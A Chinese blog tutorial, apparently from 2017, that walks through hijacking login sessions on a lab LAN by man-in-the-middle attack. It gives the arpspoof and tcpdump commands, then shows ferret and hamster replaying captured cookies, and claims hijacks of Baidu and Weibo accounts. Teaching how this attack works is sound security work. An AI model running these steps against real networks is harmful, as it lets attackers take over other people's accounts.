中间人攻击之劫持登录会话(含视频下载)


发布人:admin分类:网络安全浏览量:25发布时间:2017-12-12

关于中间人攻击

中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。

因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回话的文章,所以就有了下面。

视频下载地址:http://pan.baidu.com/s/1mgicyt6 提取码:o1ws

注:本文提供的攻击测试方法仅供安全学习教学用途,禁止非法使用

0×00

用到的工具是arpspoof tcpdump ferret hamster。

arpspoof 进行ARP欺骗

tcpdump抓去打到本地的数据包

Ferret用来处理抓下来的数据包的

Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。

0×01

拓扑环境:

攻击机:Kali 192.168.1.120

    

受害机:Windows7 192.168.1.100

    

网关:192.168.1.1

0×02

    我的几个社区帐号都是登录状态,当然未登录也是可以劫持的

    

    

    

先看下我在Kali的机器上是未登录的    

 

    

    

0×03

开始arp欺骗

  

命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

0×04

    捕获数据包

        

命令:tcpdump -i eth0 -w cookie.cap

0×05

模拟受害者登录

受害者在受害机器上就随便刷新一下或者登录一下

完毕

下面我们开始重点

0×06

处理抓去的数据包

ferret -r cookie.cap

自动生成了 hamster.txt

  

0×07

开启hamster服务

      

0×08

打开浏览器,使用代理

0×09

打开hamster 浏览器输入http://hamster

    

选择目标

    

0x0A    

找敏感地址

 

0x0B

百度劫持成功

   

微博劫持成功

    

都成功了

    

 

0x0C

我在实验的时候碰见一个问题,就是突然上不到网

下面教大家解决

编辑/etc/NetworkManager/NetworkManager.conf

    

vi /etc/NetworkManager/NetworkManager.conf

改成true后保存

    

service network-manager restart

重启服务 


被黑站点统计 - 文章版权1、本主题所有言论和图片纯属会员个人意见,与本文章立场无关
2、本站所有主题由该文章作者发表,该文章作者与被黑站点统计享有文章相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该文章作者和被黑站点统计的同意
4、文章作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
7、被黑站点统计管理员有权不事先通知发贴者而删除本文

免责声明

本站主要通过网络搜集国内被黑网站信息,统计分析数据,为部署安全型网络提供强有力的依据.本站所有工作人员均不参与黑站,挂马或赢利性行为,所有数据均为网民提供,提交者不一定是黑站人,所有提交采取不记名,先提交先审核的方式,如有任何疑问请及时与我们联系.

admin  的文章


微信公众号

微信公众号


Copyright © 2012-2022被黑网站统计系统All Rights Reserved
页面总访问量:21277303(PV) 页面执行时间:262.82(MS)
  • xml
  • 网站地图